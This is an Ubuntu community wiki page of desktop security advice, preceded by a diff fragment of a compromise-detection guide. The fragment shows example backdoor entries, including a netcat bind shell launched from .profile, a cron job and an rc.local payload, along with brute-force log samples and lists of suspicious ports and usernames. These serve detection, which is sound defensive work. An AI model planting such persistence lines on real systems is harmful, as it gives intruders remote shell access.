dangertux-laptop kernel: [ 7577.979252] Program phalanx tried to access /dev/mem between 0->1f400000.}}}<<BR>> {{{Nov 7 21:28:09 dangertux-laptop kernel: [ 7577.979292] phalanx[29055]: segfault at 763405 ip 080490ee sp bff465e0 error 4 in phalanx[8048000+5000]}}} Syslog is also one of the most popularly tampered log files, so if you see any missing time, or any anomalies it is a good idea to start looking into the potential for a system compromise having occurred. === auth.log === This file contains logs on all user authentication. This can be greatly helpful in determining if someone has gained unauthorized access to your system either locally or remotely. This file will become crucial in determining if a brute force attack has been successful against a remote administration service such as SSH. Due to the incriminating nature of this log file, this will be one of the first logs sanitized by a potential attacker. As such if this log appears to be tampered with, it is almost a dead give away that your system has been compromised. An example log snippet from a brute force against SSH might look like this : {{{Nov 7 19:39:36 dangertux-laptop sshd[1972]: Failed password for dangertux from 192.168.0.4 port 34163 ssh2}}}<<BR>> {{{Nov 7 19:39:42 dangertux-laptop sshd[1974]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.0.4}}}<<BR>> (these same entries about 5 million more times followed by this entry)<<BR>> {{{Nov 7 19:40:22 dangertux-laptop sshd[1985]: Failed password for dangertux from 192.168.0.4 port 44615 ssh2}}}<<BR>> {{{Nov 7 19:40:28 dangertux-laptop sshd[1987]: Accepted password for dangertux from 192.168.0.4 port 59713 ssh2}}}<<BR>> Also random guessing of usernames is an indication of a brute force attempt. Particularly if services and common usernames are being tried. The following are commonly brute forced usernames, if you see these names trying to authenticate against your system this is a good indicator that someone may be trying to brute force one of your services (usually SSH). {{{admin}}} {{{administrator}}} {{{nagios}}} {{{squid}}} {{{www-admin}}} {{{root}}} {{{guest}}} {{{web_admin}}} {{{www-developer}}} === ufw.log === This is your Uncomplicated Firewall log. Blocked traffic will show up here. If you have configured strong firewall rules, you may notice UFW blocking traffic to an unauthorized port. Random arbitrary ports are often used by different malicious applications, they use oddball ports to try and obfuscate their existence as they make a remote connection back to their owner. If your firewall's outbound rules are configured properly and the creator of the malicious application wasn't very diligent you should be able to notice the traffic being blocked. Here is an example of UFW blocked traffic: {{{Nov 5 14:46:18 dangertux kernel: [ 2080.258253] [UFW BLOCK] IN= OUT=eth0 SRC=192.168.0.4 DST=224.0.0.251}}} {{{LEN=67 TOS=0x00 PREC=0x00 TTL=255 ID=0 DF PROTO=UDP SPT=5353 DPT=5353 LEN=47}}} Here we see blocked outbound traffic. It is UDP originating at port 5353 bound for port 5353. It is broadcast traffic as it is bound for 224.0.0.251 which is a multicast address. It is important to pay attention to the destination and source ports here as there are quite a few ports which are frequented by malicious applications. Here are a few examples of the more common ones: 1337 4141 4444 6666 7777 9999 13337 31337 44444 There are others but if you start seeing odd traffic on any unregistered port, there is a chance that it is malicious if you did not authorize it. If you are using iptables instead of UFW, the same can be seen in either {{{syslog}}} or {{{kern.log}}}. === Watching Network Traffic === When being mindful of your system's security it is important to watch network traffic. Often times malicious applications or unauthorized access will lead to the opening of a connection that is equally malicious and unauthorized. A quick way to view your active connections, both inbound and outbound, is with the netstat command. Netstat can give you a near real-time look at the connections your system has. For instance, the command {{{sudo watch netstat -anlp}}} will provide a fairly verbose output for netstat that updates every 2 seconds. Here is example output from that command: {{http://dangertux.no-ip.org/downloads/cleannetstat.png}} Let's take a look at what that means for us. The first column tells us what the protocol is. The Recv-Q and Send-Q is how much data queued for the connection and isn't really that important. The local address is the listening address of the service, this is 127.0.0.1. The :631 indicates we are listening on port 631. The Foreign Address is the address we are connected to. 0.0.0.0:* means any host any port. We are in state Listen which means we do not have an active connection but are waiting for one. Our process ID and program name is 1122 and this is the common unix printing system daemon. Now here is an example of output that might be considered slightly more malicious in nature: {{http://dangertux.no-ip.org/downloads/compromisednetstat.png}} This output indicates a connection to a service running {{{/bin/sh}}} on 31337. This is a nearly direct indication that this machine has been compromised. === rkhunter & chkrootkit === rkhunter and chkrootkit are two applications that are designed to aid in the detection of a compromised system. They function by doing two things. First they check the integrity of commonly hooked system files. These files are often backdoored by an attacker in order to gain special access or glean credentials from a compromised system. An example of a frequently backdoored command in the Linux world is {{{/bin/su}}}. It is important to understand that rkhunter and chkrootkit function best if they are given a benchmark standard. Meaning that you run them following your initial installation so that they may get a "base line" for what your system should look like. That way if changes are made, they will be able to detect the changes as potentially unauthorized. Note, sometimes updates may throw false positives due to the way these applications work. The second thing that these applications do is they attempt to determine if your system has been compromised with a known, or signatured, root kit. They will look for files and process associated with known root kits, as well as known malicious communications ports associated with them. Additionally they will look for hidden pid's and hidden tcp ports, as this is often a sign of root kit like activity. === Bash Profiles === Yet another method by which an attacker can maintain access to a compromised machine is by loading a backdoor at login. Often times these can be noted in the following places: {{{/home/username/.bash_profile}}}<<BR>> {{{/home/username/.bash_rc}}}<<BR>> {{{/home/username/.profile}}}<<BR>> There are other locations but these are the three most targeted. An example entry that might be found in a modified .profile might include: {{{nc -l -p 4444 -e '/bin/sh' &}}}<<BR>> this would start a netcat listener that executes a shell when an attacker tried to connect. The persistence is there because it is in your {{{.profile}}}, and will be loaded every time your shell is loaded. === Cron Jobs === Another common way an attacker will maintain access to a compromised system is to add a cron job with a backdoor. This backdoor might be a simple netcat listener or it could be something else. In any case, if you suspect that you have been compromised, checking {{{cron}}} is a good idea. The following output from {{{sudo crontab -l}}} indicates that something not so kosher is happening every 5 hours. {{{# m h dom mon dow command}}}<<BR>> {{{* 5 * * * /home/dangertux/reverse_tcp}}}<<BR>> Additional places to check for cron jobs being placed are as follows: {{{/etc/cron.daily}}}<<BR>> {{{/etc/cron.weekly}}}<<BR>> {{{/etc/cron.hourly}}}<<BR>> {{{/etc/cron.monthly}}}<<BR>> {{{/etc/cron.d}}}<<BR>> === Tampered Environment & LD_PRELOAD === Another method a system may be backdoored is by adding the {{{LD_PRELOAD=}}} attribute to the environment. This will load a library often used to hook system calls and escalate privileges on a system. You can view your current environment by utilizing the printenv command. (Note that each user has their own environment.) Additionally, if you suspect this you may wish to check {{{/etc/ld.so.conf.d}}} for any malicious links. === Hooked Run Level Scripts === An attacker will also commonly hook the {{{rc.local}}} on a root compromised machine. They will do this to maintain their presence on the machine. If we look at the contents of our {{{/etc/rc.local file}}} we may find there is something not quite right on our compromised machine. An example entry in this file might be something along these lines: {{{sh '/usr/local/lib/.bad/libowned-4.0.0.so' &}}} This indicates that whatever {{{libowned-4.0.0.so}}} is, it is being executed at boot time generally by default. This file will not contain anything but a single exit 0 line. So if you see some strange additions here, particularly something as obvious as this line, it is safe to say your machine may be compromised. Additional areas to check for potentially malicious scripts are the following directories: {{{/etc/rc0.d}}}<<BR>> {{{/etc/rc1.d}}}<<BR>> {{{/etc/rc2.d}}}<<BR>> {{{/etc/rc3.d}}}<<BR>> {{{/etc/rc4.d}}}<<BR>> {{{/etc/rc5.d}}}<<BR>> {{{/etc/rc6.d}}}<<BR>> {{{/etc/init.d}}}<<BR>> {{{/etc/networking/}}} (particularly note your interface pre-up and up scripts may be tampered with)<<BR>> === Additional Users === Often times when a system is compromised an attacker will create an additional user to allow them return access in the event you change your password. If you suspect a compromise has occurred you can and should check for the creation of additional users. You may notice something similar to the following in your {{{auth.log}}} file if a user has been created. {{{Nov 8 11:22:14 dangertux-laptop useradd[1517]: new user: name=reallybadguy, UID=1001, GID=1002, home=/dev/null, shell=/bin/sh}}} <<BR>> {{{Nov 8 11:22:14 dangertux-laptop useradd[1517]: add 'reallybadguy' to group 'admin'}}} <<BR>> {{{Nov 8 11:22:14 dangertux-laptop useradd[1517]: add 'reallybadguy' to shadow group 'admin'}}}<<BR>> In your {{{/etc/passwd}}} file you may also notice an entry similar to this: {{{reallybadguy:x:1001:1002::/dev/null:/bin/sh}}} <<BR>><<BR>> ----- |
|
| Line 337: | Line 170: |
| This Wiki was birthed on the Ubuntu Forums by [[http://ubuntuforums.org/member.php?u=1418836|MrLeek]] and [[http://ubuntuforums.org/member.php?u=1455355|Ms. Daisy]]. Contributions came from [[http://ubuntuforums.org/member.php?u=1322416|Dangertux]], [[http://ubuntuforums.org/member.php?u=946893|OpSecShellShock]], [[http://ubuntuforums.org/member.php?u=1317912]| haqking]], Thewhistlingwind, dFlyer, vasa1, [[http://ubuntuforums.org/member.php?u=571173|Olle Wiklund]], [[http://ubuntuforums.org/member.php?u=923868|CharlesA]] | This Wiki was birthed on the Ubuntu Forums by [[http://ubuntuforums.org/member.php?u=1418836|MrLeek]] and [[http://ubuntuforums.org/member.php?u=1455355|Ms. Daisy]]. Contributions came from [[http://ubuntuforums.org/member.php?u=1322416|Dangertux]], [[http://ubuntuforums.org/member.php?u=946893|OpSecShellShock]], [[http://ubuntuforums.org/member.php?u=1317912]| haqking]], Thewhistlingwind, dFlyer, vasa1, [[http://ubuntuforums.org/member.php?u=571173|Olle Wiklund]], [[http://ubuntuforums.org/member.php?u=923868|CharlesA]] and a Mystery Guy ;) |
Basic Ubuntu Security Guide, Desktop Edition
Who Did We Write This For?
Security is a very broad, potentially daunting subject to a new Ubuntu user. It's crazy to think that anyone can boil security down to a list of 7 things. So we didn't even try. Instead, our goal is to present a listing of the most basic security concepts that can be fairly easily implemented while you learn. This guide was inspired and written by several new users of Ubuntu who were very interested in learning how to hack around their brand new Ubuntu operating systems. We were lucky enough to have some security professionals collaborate with us. But we still don't claim that we will reduce your risk to zero. We are presenting a pragmatic approach to security.
This guide is intended for the typical, average home user that is in the process of learning how to use Ubuntu. So if you just surf the net, play games (on-line & off-line), do on-line banking, education...then you are the intended audience. However if you are running a network server (especially one that is accessed via the Internet) or if you use Ubuntu in your corporate environment (or simply work from home) then the advice you need is more specialized and beyond the scope of this guide. If you don't know whether you are running a server or not, then read this.
The most basic set of rules
If you're a simple desktop user who only uses his computer for the most ordinary things, then this is the basic rule set:
1. immediately install security updates when you're notified;
2. do not install antivirus, as you *really* don't need it in Linux;unless you share files with Windows
3. enable the firewall (sudo ufw enable) without further tweaks;
4. stick to the official repo's as much as possible, and only deviate from them when strictly necessary and with much caution;
5. keep Java (both openJDK and Oracle Java) disabled by default in your browser, and only enable it when needed;
6. use Wine with caution;
7. and most important of all: use your common sense. The biggest security threat is generally found between keyboard and chair.
If you have higher security needs, then read on.
Security Tools and Concepts That Are Easy to Use
In order to simplify the very complex world of security, we have broken it down into two sections. In this first section, we will discuss security tools in Ubuntu that you can configure and (once configured) require little interaction. We will also discuss general security concepts that are easy to implement into your daily computer use. There is a lot of existing security information already in existence in the Ubuntu Wikis and stickies in the Ubuntu Forums. There are some great resources there, in fact one of the best guides is linked here. But a lot of that material will seem complex to the new Ubuntu user - so the goal of this guide was to take the existing material and simplify it, making it possible to bridge the gap.
Your Tolerance for Risk
We've all heard the argument that if you make a system secure, you also hinder access, create obstacles, and complicate use. It is up to the individual user to determine what his tolerance for risk is. This Wiki will outline vectors of potential vulnerabilities in your Ubuntu system, and you can evaluate them and determine how those risks relate to your personal situation.
Linux Vulnerabilities
The majority of new users are coming from Windows environments, where security focuses mostly on anti-virus software. To understand security on Ubuntu, you must shift your thinking from this point of view. In the following bullets, we're going to analyze what threats actually effect you as a Ubuntu user.
Myth: If I install an anti-virus program I'll be fine.
Reality: At the time of writing, there are no known viruses on the big bad web designed to target Linux. A few targeting Windows can execute in a manner that could allow compromise of a Linux system via an interpreter layer like Wine. Very few people recommend existing anti-virus software for Linux machines, in part because there are few decent free anti-malware solutions available. Enterprise class solutions are good, but the consumer-grade products aren't on par with their Windows counterparts enough to warrant their use. Moreover, if you focus entirely on viruses then you are ignoring the vast majority of real threats to your Ubuntu machine.
Myth: Security through obscurity keeps me safe.
Reality: It's a favoured argument from Linux supporters, but Linux/Ubuntu is not that obscure to “crackers”. They may be obscure to you or your friends, however, there are many who know how to exploit Linux vulnerabilities just as easy as Windows, Mac OSX, Solaris, AIX, or any other operating system's vulnerabilities. The best defence is knowledge and preparation. Relying on an “obscure” operating system to hide behind is NOT a good strategy.
Myth: I can browse however I want to because malware on the web is mostly designed for Windows.
Reality: While the majority of malware does target Windows, this statement overlooks the fact that an entire spectrum of web based attack vectors exist that work on any operating system. Cross Site Scripting, Cross Site Request Forgery, Click-Jacking, Session Riding, and many other methods can be used to exploit weaknesses in a relationship of trust between you and a website, or a website and you, regardless of your operating system. For things like this we have browser add-ons which will be discussed in the browser security section.
Myth: I don't need to use fancy browser add-ons when using public access wifi because I use Ubuntu.
Reality: An absurd statement. Most attacks carried out on public wifi include several varieties of man in the middle attacks. If you want to utilize public wifi, it is highly discouraged to do anything more than trivial in nature with it unless you are an advanced user and you know how to set up a virtual private network (VPN), a VPN via Secure Shell (SSH), or use Secure Sockets Layer (SSL) in conjunction with SSLstrip.
Myth: I don't need a firewall because Ubuntu has no open ports by default.
Reality: This is a matter of risk tolerance. Added protection, particularly that which takes only a few minutes to set up, is always worth it. Firewalls are discussed in more depth later in this document.
Myth: Windows malware can not compromise Ubuntu.
Reality: Ubuntu CAN be compromised by Windows malware if you're using Wine. This is not to say that Windows malware can infect a Linux system directly, however it CAN, if targeted properly, utilize the Wine interpreter to send system calls to the Linux kernel. This is a very rare case, and it is highly unlikely that it would occur as it would be a very targeted attack. But for completeness sake we should mention that it CAN happen.
Myth: Ubuntu is harder to exploit than Windows, Mac OSX, whatever else - and it's targeted less than those other operating systems as well.
Reality: The process of discovering a vulnerability and exploiting it is pretty much the same across the board, regardless of operating system.
These are just some common myths associated with Ubuntu and security. This list is not comprehensive, but it covers the largest misconceptions held by new users. This does not mean that Ubuntu is inherently insecure, or is less secure than previous versions, or is more/less secure than any other operating system. It is just an effort to dispel common myths and get the reader (you) thinking in a positive direction toward improving their system's security posture. If you follow the steps in this Wiki, you will have a decent defense built to protect your machine from viruses as well as the other more pressing threats out there.
And of course, we'd be remiss not to mention social engineering. What information you're putting into public view? Do you know who you're giving valuable information to? Social engineering is important to understand but beyond the scope of this Wiki.
Backups
Reinstalling an operating system again after it corrupts is annoying. But losing valuable personal pictures, letters, emails... these are priceless and cannot be replaced. If you are prepared to wipe and reinstall with very little notice, then you are far more secure. Moreover, there are many threads in the Ubuntu Forums that describe problems that would have been avoided if the user had made good backups. It is important to make special backups before certain risky operations like upgrading to a new version, operations on partitions and partition tables, using dd, etc. Finally, if you're concerned that your computer has been infected or "cracked," then you can restore Ubuntu to a known previously good state.
To quote the introduction of Duplicity Backup, "There are many different applications that are available to backup Ubuntu. Each one has its strengths and weaknesses. Some are made for enterprise environments where it is necessary to back up many computers quickly and efficiently. Others are made for home environments and come with a simple wizard-driven GUI or command line interface...Each application can backup to one or many DVDs, CDs, disk drives, and other media or may not backup to one or more of those things. As varied as these programs are, so are the needs of the individuals who use them." This link can help you decide where to backup your data, what to backup, and when.
It All Starts With a Good Password
Obviously if an attacker doesn't have your password, then it's harder for him to make changes on your machine. A strong unique password for each account is best - consider using a password safe (but remember that that password MUST be a good one!) Read this discussion regarding the process of choosing a good password.
Know What Sudo is Doing
If you're following a set of instructions and you're about to type in sudo, ask yourself "Do I REALLY know what this command is about to do?" If you can't explain it to your grandmother, then you don't know what's going to happen. Related to that - if you get asked for your password, make sure you know what you've just done to trigger that response. The system is trying to protect you. Here is an explaination of sudo
Don't Log in as Root
An excellent way to find yourself in deep trouble is to modify permissions as root. Logging in as root means you will be browsing the Internet as root, drive by downloads (downloads that you did not authorize or that you authorized but did not realize the consequence behind), malicious scripts can all now execute with root permission. Default settings in Ubuntu will not allow you to log in as root.
Encrypt Your Home Folder
Encrypting the home folder will help for physical security. If someone is able to sit down in front of your computer or if they steal it, they won't be able to see the files in your home folder. In Ubuntu when you encrypt the home folder, the folder mounts when you log in which makes it readable to anyone sitting in front of your computer. Once you log out, the home folder unmounts and is encrypted again. Encrypting the home folder will do nothing to protect you from on-line threats. As long as the encrypted folder is mounted, it will be plain text for anyone with access.
You can encrypt your home folder or the entire hard drive on first install. Alternatively you can click here and here to learn how to add encryption to your home folder after installation. You could even just encrypt a particular file, a sub-directory, a usb stick... the choices are endless.
There are risks with encryption, so carefully evaluate your personal situation to determine if it is right for you. If you lose the password then your chances of recovering the data drop to almost nil. You should also keep in mind that if you encrypt your home folder or hard drive, that if your system fails later on it will be harder to recover your files. You will have to consider the value of the data you store on your computer to determine if encryption is worth the risk. For instance, if you insist on saving a detailed list of all your financial accounts in a text file, then encryption is vital. But if you don't store anything of personal value on the hard drive, then encryption may be less necessary.
Least Privileges, Always
Always make sure you are using the least amount of privileges/permissions to do the task necessary. Use only what you need, nothing more. If you are surfing the net and come across a "drive-by download" site, then what the malicious program has access to changes dramatically if it has lowered privileges. Learn how to use file permissions and non-privileged users (which Ubuntu makes very easy). Here is a link to everything you need to know about file permissions. Also consider enabling guest accounts if you will have other people using your computer.
Security Updates
Security updates are released by Ubuntu developers when they discover and patch vulnerabilities. If you don't install the updates then you retain the vulnerability. Ubuntu allows you to have security updates automatically installed - once configured you don't need to run security updates manually again. Search for the Update Manager on your desktop and click on "settings" to configure how you want Ubuntu to manage updates. Or you can configure automatic updates via terminal.
Know What You Have, Have What You Know
Don't run services you don't need. Do you really need a VOIP phone system? What about Secure Shell (SSH), Virtual Network Computing (VNC), Apache server? If you need a service, make sure you understand it and can properly secure it. You can't secure what you don't understand.
Make Your Browser More Secure
The majority of threats to your machine come from your browser, even when you use common sense. You have absolutely no control over vulnerabilities on someone else's web page as an end user, so it's important to defend yourself against any malicious activity originating from a compromised web page. If you are interested in learning how browser exploits happen, you can read this summary of the top ten vulnerabilities in a poorly designed web page.
Secure your browser. We will discuss Firefox because that's the browser packaged in Ubuntu. However, other browsers have similar features. We recommend that you use the following services. As mentioned before, these measures may inhibit functionality until you manually configure them. Again you must weigh the need for security against the need for functionality as it relates to your personal situation.
Preferences
Find Preferences in the menu bar of Firefox. Under the privacy tab you can tell web sites you don't want to be tracked and you can choose to never remember history. You can choose to whitelist sites for specific needs using exceptions, allow for session at most; clear history when closing the browser. Choose "never remember history" so that if someone hijacks your browser section, they won't find any valuable stored data. Don't use "hardware acceleration".
NoScript
If you unknowingly visit a compromised website, this will prevent scripts (i.e. programs) from running on your system. It can be a tricky tool to use at first glance as it blocks all scripts from running at first. If you spend a little time getting familiar with NoScript, you will find it easier to use. As a user, you tell NoScript what sites to partially or fully trust. Don't "allow all scripts globally" under any circumstances!
Configuring NoScript is notoriously daunting to the new user. A helpful guide to configure NoScript is included on a separate page, https://wiki.ubuntu.com/BasicSecurity/NoScript.
AdBlockPlus
You can tell by the name that it (surprise!) blocks annoying ads, but it can also block those ads from collecting personal information about you. Adblock Plus provides a default list of blocked ads. Additionally, you can block any individual ads or scripts that show up by adding them manually.
BetterPrivacy
The add-on BetterPrivacy will prevent websites from installing “super cookies” on your computer designed to track your history for marketing research.
ClickClean
ClickClean is a simple tool to delete your browsing history, erase all temporary internet files, remove downloaded files history, cookies, Flash LSO, typed URLs. Allows for automatic deletion of private data when Firefox closes. Basically if your browser session is ever hijacked, then the hijacker will get little valuable information.
The importance of securing your browser cannot be overstated. We've listed some of the simple tools you can implement to drastically improve your security. There are numerous others aimed at security as well as privacy, we encourage you to research those.
Home Network
Most computer users at home have a local network...often without even realising it. We encourage you to learn more about securing your home network - again, you can't secure what you don't understand. The CERT Guide to Home Network Security provides an excellent overview of the basic principles of networking and the internet. Learn some of the fundamentals about securing your router. For instance, if you use wireless access, make sure you're using STRONG encryption: not WEP but WPA/WPA2. Use a GOOD password consisting of all 63 characters, you only have to type it once anyway.
Devices plugged into your network can be accessed by unauthorized users just as easily as your computer can. Learn about making a networked printer more secure.
Repeating All of the Above on Each System
Be consistent, if you do these things with your desktop Ubuntu system you will find it is actually pretty secure. If you have two computers running Ubuntu, then repeat this process on both computers. If you've got one computer partitioned, then secure all partitions. Now apply this to the other devices on your network. This includes any other computers, cell phones, routers, printers, game consoles whatever. Your network's security is only as strong as the weakest link.
Security Tools You Have to Regularly & Actively Engage
So that was the "easy" stuff. True security is an ongoing process, and a lot of the really good security tools require regular interaction from you. The next tools we describe are more advanced because you cannot "set and forget" them. They also require more effort to setup and use effectively, but the effort is worth it. The more security measures you implement from this Wiki, the more secure you will be.
Firewall
There is a lot of existing information about firewalls - along with a long-term raging debate on the need of a firewall on Ubuntu. We recommend you enable it because you have ports open if you are reading this page. Traffic can go in and out of that port unhindered without a firewall. Malicious programs can open arbitrary ports unless you have a firewall to prevent that. A NAT router can add a layer of protection, but it will not protect you in lieu of a firewall. This additional guide will provide more information.
Use your firewall PROPERLY. Don't set it and forget it, learn how it works, set decent rules.Here is a tutorial showing how to enable a firewall in Ubuntu. However, adding port numbers can feel confusing. It if helps, think of it this way - currently you're reading this guide because you accessed a webpage hosted by wiki.ubuntu.com. To make the connection (and therefore to see the content) you have to connect your browser to that website by accessing Port 80. Another example is when you pick up your email. Your computer makes a connection to your mail server on Port 110. The other port numbers that you add provide similar functions.
AppArmor
AppArmor can strengthen our security. To quote the Novell site, "AppArmor is designed to provide easy-to-use application security for both servers and workstations. Novell AppArmor is an access control system that lets you specify per program which files the program may read, write, and execute. AppArmor secures applications by enforcing good application behavior without relying on attack signatures, so it can prevent attacks even if they are exploiting previously unknown vulnerabilities." AppArmor has a pretty steep learning curve for new users. However, once you master it, creating profiles for most applications is fairly simple. It only gets tricky when you deal with applications that have to change functions a lot (for instance, Apache). Here is a tutorial on AppArmor.
Did I Just Get Owned?
For a helpful guide created by Dangertux which can help you determine if you have been compromised, see this page:
https://wiki.ubuntu.com/BasicSecurity/DidIJustGetOwned
Acknowledgements
This Wiki was birthed on the Ubuntu Forums by MrLeek and Ms. Daisy. Contributions came from Dangertux, OpSecShellShock, haqking, Thewhistlingwind, dFlyer, vasa1, Olle Wiklund, CharlesA and a Mystery Guy 
BasicSecurity (last edited 2012-12-28 10:50:07 by host86-182-68-148)